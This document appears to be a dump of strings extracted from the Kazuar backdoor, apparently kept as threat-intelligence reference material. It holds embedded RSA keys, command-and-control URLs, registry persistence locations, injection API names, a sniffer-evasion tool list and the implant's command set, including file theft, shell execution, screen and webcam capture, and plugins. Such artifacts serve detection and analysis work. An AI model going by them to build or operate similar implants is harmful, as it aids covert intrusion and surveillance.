turla_toolkits/2019-01-28_Turla_kazuar_config_excerpt.conf
| Fatal failure due to {0}: | |
| Kazuar's {0} started in process {1} [{2}] as user {3}/{4} | |
| entry point | |
| loader service solver sender singler scripter Data signature is invalid | |
| RSAKeyValue><Modulus>m4SbvlZhH5UzcgDLIEIygjTCCQMxc/TrwUYZ5JA5SU2jtSBt9aqwljKJ7h4Tv5eP2Efy4Z+2QajDNtOThift4nVTWsl+iOoMKKV6pvQOFj6k2P4kRTBGo/t8J46j7DqnFeMHXUjhjv2RFnp1nms8thE6+MJsI0lnxYTLBip5mNbj+Jbr7vVzK8MKnjGxsr9FoRBVNyZM+ILFu3aO62z1a8PIrI4kqVVggD35oF4WdSrmVLFvec/1ej3Cx12NjqCXo3lZhwxlIKjFNMNtslXnk0o9L/ZlWlEjqXiez/3ryzpVBrlrtb9D+x1ZRtv58jtdSTE61//jtEb3mMUeTry+2w==</Modulus><Exponent>EQ==</Exponent></RSAKeyValue> <RSAKeyValue><Modulus>gSI+OxtBrfXVfSRRSlNIMVYr9HFy40jokIDkUqffhU7Y/VcFB1nc8GwT4GOjK6lR/mJi3XcGg+nxqR9iLoeoOLgBFFz9O1l++81tPtRaVZ8yg+IzmZlaMhdOg0apatxhjRA/4pYOhZHwifQIjZzid6/+BgYIPBXWcX8e58l1PH+chm3DJzJ2gdHOsx6Dz9HHPr+sGLshAFF35ICb/11jq0vU9KU7CjYdf0Rvl16EDYyUQXbIG1ZMaTDzBrMcXZrBfXHEqn2Qwr4NiaDUwOwGCynBtSZXoNOfHArYxbRaBA269SPKhZgCBqdAhYfPFe2q8r8Y4fz21iZTqTngMsA2zw==</Modulus><Exponent>EQ==</Exponent><P>hGjs2pEZW4pN2b0Bm9xl84zxqQ2BMSflj2xpf5MH+XvCY5BBN3YROm24LYtGwy3xOdKeUJOENvYbkvirBcm2ecRxmLgE5AMMeWxZpOayUtOUd+Abx3+TT8giPG3sqEHtuaHVUjypBloE4EWnFWrmq0f3+Kpi8kHFxLul9jHubsc=</P><Q>+ap/8gRvidWrAhZcAiCAYdFZIt6hSwBz5ohU5ZSPomv9e/Urtts8cin+QeBvDwF6UvyP1vz3wxUOXycaBI3StCMjCXHuBLN+wfpEhfdt6KKywsmW7I5OdogIbVRLTUJvBtiXBGG3c10ay3H8TYx00lt6GgcLAJZMZE4mHEjnj7k=</Q><DP>D5PfoT4/N/InRsrxIWU5K7Y6jFvxFNeEaznuSz55aKUl7ZiAJKR6f1gzyR9xvJv+Qwm4RbcAfu/HAjtfahe7HWJnt50twHjUSoU3uQwU+q964O0wcdLGCWLW2e7QjEP92ZqRkTRQHt1p/ERuAoUMFCaVpMjAWLxxnqyqHPbQwb0=</DP><DQ>vuvLQJn68O6v8omRp0YH0lTLsUDVsdMrdA3mkXGbA7v+E38/i9TT3tTRfaugOKbG9CqMHN+QSeLs31oi9Gxz8yntnc+X5XozwYMlV2Lbk8e14D/Nw/RaHmgGcbjuSiO+UIeCiuFQDOzYQTkMO01KRoIwMgVixDay40rR2WTtT8k=</DQ><InverseQ>cfVixwsMog8F8CDikcYKNmUGNJPeJ4grdJi4ZIMX5mSuhdvSccTnx7JoCMJ2LKwFLyMnmZIIeYF4EYBgwHz6rumL8Zam6Zr04uIpxWL3MZyR9BImREmH6e6aFzHq/P02phU6tNbzkHMp6QGsfgtkLSmzOed0GsvfwAxCfD20PXU=</InverseQ><D>PMTR/bJ5Qs4KHMXL5r3Hnr8jvlOBW+YTFtM+RQO0evftpGUviv0crWAJWok9ujGP/z1bs4NOXDHbImkfJPSLZfw8vknglGZZ3+gzaNxmvuGBLwEJOTkbYt3KmCFAqsIPyemHebAG1XHam0WprA2Xv9pZbD8S7xlV2w6lIcg3K4ak6tNG2yKepoQ2DvFdF/ZTtOu0ybE+g8AA6UxWCy/liTLN2fxgVwP45XAAFIue/x6aF6m09gxi/xJaxwafEeonVZU9aaqpby
b5eeMixRSbkVuK2DZrF/lW9oedp0mYtI+E7nRyxykxFl3rrC9B8ETKBzNONPgB4PpuaSSdC0ELcQ==</D></RSAKeyValue> 9 | |
| https://www.northviewcanada.com/wp-content/galler/slider/ = https://www.zycie-chotomowa.pl/wp-content/languages/index.php - | |
| DISABLED http://*:737/ | |
| iexplore firefox browser outlook chrome nlnotes notes2 opera msimn | |
| 169739e7-2112-9514-6a61-d300c0fef02d => B | |
| Global\{0} | |
| singleton-instance-mutex | |
| Second instance. | |
| old | |
| wscript | |
| cscript | |
| single install COMSPEC SHELL | |
| cmd.exe | |
| bin/bash | |
| dbgview.exe C | |
| perf|ms|sec|srv|man|mon|log|ctl|cnt|sys|upd|nv|pnl|fl|ad|int|jv|amd | |
| perf ms sec srv man mon log ctl cnt sys upd nv pnl fl ad int jv amd | |
| Performance Microsoft Security Service Manager Monitor Logging Control Counter System Update Nvidia Panel Flash Adobe Intel Java AMD base N # | |
| select * from Win32_OperatingSystem | |
| OSArchitecture | |
| InstallDate {0}{1} ({2}) {3} Caption 32-bit Version {0} {1} {2} {3} û E | |
| Mozilla/5.0 (Windows NT {0}.{1}; rv:22.0) Gecko/20130405 Firefox/23.0 ? | |
| Mozilla/5.0 (X11; {0} {1}; rv:24.0) Gecko/20100101 Firefox/24.0 | |
| dd.MM.yyyy HH:mm:ss (zz) [{0}] {1} | |
| 0}.{1:D2}:{2:D2}:{3:D2} {0:D2}:{1:D2}:{2:D2} {0:D2}:{1:D2} ??? | |
| ### EB | |
| ### PB | |
| ### TB | |
| ### GB | |
| ### MB | |
| ### KB {0} B | |
| Unhandled exception {0} | |
| 0:0000}-{1:00}-{2:00}-{3:00}-{4:00}-{5:00}-{6:000}.{7} A Z z res tsk cols |{0}| | |
| 0}| | |
| 0} | | |
| 0}$ 72C24DD5-D70A-438B-8A42-98424B88AFB8 | |
| CreateShortcut | |
| TargetPath | |
| IconLocation | |
| WorkingDirectory | |
| Description Arguments Save | |
| ustar 00 | |
| unknown/unknown {0} | |
| 0} -> {1} {0} doesn't exist! | |
| ERROR: {0} {0:00}:{1:00}:{2:00}.{3:000} | | |
| systlog.txt | |
| userlog.txt | |
| tasklog.txt | |
| Task #{0} failed due to {1} | |
| system PUT | |
| Task #{0} execution started: | |
| user - {0}/{1} ({2}) proc - {0} [{1}] | |
| time - {0} Task #{0} execution finished. | |
| tran # Using default transports due to {0} % Unable to store transports due to {0} | |
| serv Using default servers due to {0}" Unable to store servers due to {0} | |
| uuid! Using default agent id due to {0} # Unable to store agent id due to {0} | |
| intv! Using default interval due to {0} # Unable to store interval due to {0} | |
| cont* Unable to get last contact time due to {0} | |
| arun% Using default autorun type due to {0} ' Unable to store autorun type due to {0} | |
| remo$ Using default remote type due to {0}& Unable to store remote type due to {0} | |
| storage | |
| 0} | {1}a-zA-Z0-9 ]*$ ( | |
| Transport process name '{0}' is invalid.( sdsadsadsa | |
| Control server address '{0}' is invalid. | |
| Invalid sender interval. | |
| Invalid last contact time. X16 | |
| 0} [{1}]: single HKCURUN - SOFTWARE\Microsoft\Windows\CurrentVersion\Run | |
| RUNONCE 1 SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | |
| LOADKEY load4 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | |
| POLICIES? SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | |
| WINLOGON Shell explorer.exe, {0} 5 | |
| SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | |
| STARTUP | |
| shell32.dll, 3 .lnk Startup path is empty. Ð Autorun failed due to {0} ) | |
| '{0}' autorun algorithm is not supported! | |
| HTTP listening isn't supported. | |
| Remote failed due to {0}" | |
| Remote iteration failed due to {0} ˆ | |
| Remote control failed due to {0} | |
| OPTIONS | |
| POST | |
| GET ) | |
| Remote request from {0} failed due to {1} OK Got new task #{0} from {1}. | |
| Got '{0}' command from {1}. % '{0}' request method isn't supported. | |
| status Access-Control-Request-Headers Access-Control-Request-Method | |
| Origin Access-Control-Allow-Headers Access-Control-Allow-Methods Access-Control-Allow-Origin Access-Control-Allow-Credentials | |
| true Vary Accept-Encoding, Origin text/xml; charset=utf-8 È | |
| continue Result #{0} was taken by {1}. file | |
| 0:X16}.res | |
| *.tsk ftp ftps STORâ RETR NLST .tsk DELEú | |
| Invalid FTP server status ({0}). http https AuthToken | |
| Scheme '{0}' is not supported! Send iteration failed due to {0} No servers available now. , | |
| Unable to send result #{0} to {1} due to {2}& Unable to get task from {0} due to {1} | |
| Sending result #{0} to {1}... | |
| Result #{0} was sent to {1}. | |
| Sending request to {0}... | |
| Request was sent to {0}. | |
| megadumper smartsniff snoopypro wireshark ethereal tcpview tcpdump windump portmon dsniff | |
| Sniffer found: '{0}'! | |
| ipc://{0}/{1} | |
| IPC channel is not ready. # | |
| Failed to create channel due to {0} $ | |
| Failed to create injector due to {0}! | |
| Failed to create agent due to {0} | |
| portName authorizedGroup chan shar Got new '{0}' command. $ | |
| Unable to execute command due to {0} Unable to return logs due to {0} | |
| Solving task #{0}... | |
| Task #{0} solved. | |
| KAZU& Unable to execute task #{0} due to {1} * | |
| Unable to delete task #{0} file due to {1} ' | |
| Shell_TrayWnd | |
| LoadLibrary | |
| HookProc@12 | |
| HookProc | |
| GetProcAddress | |
| SetWindowsHookEx | |
| UnhookWindowsHookEx | |
| RtlCreateUserThread | |
| WaitForSingleObject ¬ | |
| NtCreateSection < | |
| Waiting for window '{0}' failed. | |
| PostMessage | |
| Waiting for shellcode failed. | |
| NtMapViewOfSection | |
| Qmchftgcnsksporjfdcn | |
| dll | |
| OpenProcessToken | |
| GetTokenInformation | |
| GetSidSubAuthority | |
| DuplicateTokenEx | |
| winsta0\default | |
| CreateProcessAsUser | |
| explorer | |
| OpenProcess | |
| Injecting into {0} [{1}]... | |
| Injecting into explorer... | |
| Injected into {0} [{1}]. | |
| Injected into explorer. ' | |
| Process {0} [{1}] exited with {2} code. | |
| Shellcode error {0:X16}. | |
| Injection failed due to {0} | |
| Run-time error {0}:{1}. | |
| Run-time error {0}:{1:X8}. t | |
| Injection loop error at [{0}:{1}] due to {2}¬ | |
| Process {0} [{1}] impersonated. * | |
| Unable to impersonate {0} [{1}] due to {2} | |
| New plugin {0} was installed. plg | |
| Plugin {0} was started. % | |
| Unable to start plugin {0} due to {1} $ | |
| Unable to stop plugin {0} due to {1} stopped working | |
| 0} is {1} | |
| Plugin {0} was removed. | |
| Plugin Name Stop Start ' Invalid or unknown action format ({0})! . | |
| Action with identifier {0} is not implemented. | |
| get ' Get command requires file query string! % | |
| Created date mismatch in get command! & Accessed date mismatch in get command! & Modified date mismatch in get command! | |
| Getting file query {0}... | |
| {0} was skipped. | |
| put ' Put command requires correct file path! | |
| Put command requires payload! Putting file to {0}... | |
| payload | |
| cmd * Cmd command requires actual commands list! | |
| Executing command with {0}... | |
| sleep | |
| Sleep interval is longer than supported! | |
| Going to sleep for {0}... upgrade ! | |
| Upgrade command requires payload! | |
| Upgrading agent... scrshot | |
| Taking screen shot... Ì jpg camshot | |
| Taking webcam shot... WebCapt € à | |
| Unable to create capture window. | |
| Image is empty. ! | |
| Uuid command requires identifier! | |
| Setting agent id to {0}... D | |
| interval* Max interval value is less than min value! * | |
| Min interval value is less than supported! * | |
| Max interval value is more than supported! , | |
| Setting transport interval to [{0} - {1}]... | |
| server , Server command requires at least one server! Setting transport servers: o {0} | |
| transport 5 Transport command requires at least one process name! Setting transport processes: | |
| autorun 0 Autorun command requeres autorun type to be set! Setting autorun type to {0}... | |
| remote Setting remote type to {0}... | |
| info Getting system information... | |
| Agent information | |
| Information type | |
| Information value | |
| Agent identifier | |
| Executable path | |
| Storage path | |
| Fake visible name | |
| Description label | |
| Machine seed | |
| X8 | |
| Parallel tasks | |
| Last contact | |
| Autorun type | |
| 0} - {1}] | |
| Transport interval | |
| Command servers | |
| Transport processes | |
| System information | |
| Computer" | |
| select * from Win32_ComputerSystem | |
| Manufacturer | |
| Model | |
| Motherboard | |
| select * from Win32_BaseBoard | |
| Processor | |
| select * from Win32_Processor | |
| BIOS | |
| select * from Win32_BIOS | |
| Video controller# | |
| select * from Win32_VideoController | |
| Disk drive | |
| select * from Win32_DiskDrive | |
| CDROM drive | |
| select * from Win32_CDROMDrive | |
| Network adapter " select * from Win32_NetworkAdapter | |
| Operating system Framework version | |
| Command shell | |
| Machine name | |
| System directory | |
| Current culture | |
| UTC time | |
| Local time | |
| Computer uptime | |
| User information | |
| Full name | |
| Authentication | |
| Local groups and members | |
| Group Member , | |
| select * from Win32_Group where Domain='{0}'Z | |
| select * from Win32_GroupUser where GroupComponent = "Win32_Group.Domain='{0}',Name='{1}'" | |
| PartComponent Name= " | |
| Installed software Product Publisher ? | |
| SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall 3 | |
| SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Special folders S | |
| pecial folder name | |
| Folder path | |
| Environment variables | |
| Variable name | |
| Variable value | |
| Network adapters | |
| Identifier | |
| Speed | |
| MAC address | |
| Type Received Sent DHCP DNS Gateway Anycast Multicast Unicast Active network connections Local address | |
| Remote address State TCP --- Listening UDP | |
| Logical drives | |
| Drive name | |
| Drive label | |
| Root directory Format | |
| Total size Free size Running processes PID PPID User | |
| Start time Session | |
| Command line select * from Win32_Process GetOwner {0}\{1} ProcessId ParentProcessId | |
| CreationDate SessionId | |
| CommandLine ps % -eo comm,pid,ppid,user,start,tty,args | |
| Opened windows Process ÿ Directory listing for {0} | |
| Path Size Created DIR FIL | |
| information | |
| User roles | |
| User groups | |
| DisplayVersion | |
| DisplayName | |
| copy" Copy command requires source path! ' | |
| Copy command requires destination path! ¬ | |
| Copying file from {0} to {1}... | |
| move" | |
| Move command requires source path! ' | |
| Move command requires destination path! | |
| Moving file from {0} to {1}... | |
| remove " Remove command requires file path! Removing file {0}... (_._) | |
| findir ( List command requires file query string!& | |
| Created date mismatch in list command! ' | |
| Accessed date mismatch in list command! ' M | |
| odified date mismatch in list command! | |
| Searching file query {0}... S | File creation time: | File modification time: | File size: | | |
| File path: | {0} | {1} | {2} | {3} | |
| kill1 Proc kill command requires name or pid to be set! | |
| Killing processes... {0} [{1}] tasklist Listing processes... suicide Commiting suicide... | |
| plugin Plugin command requires payload! Installing plugin... Plugin installed. | |
| plugout , Plugout command requires plugin name string! Removing plugin... | |
| Plugin removed. pluglist Listing plugins... | |
| Plugin {0} | |
| run % Run command requires executable path! " | |
| Running executable {0} with {1}.. |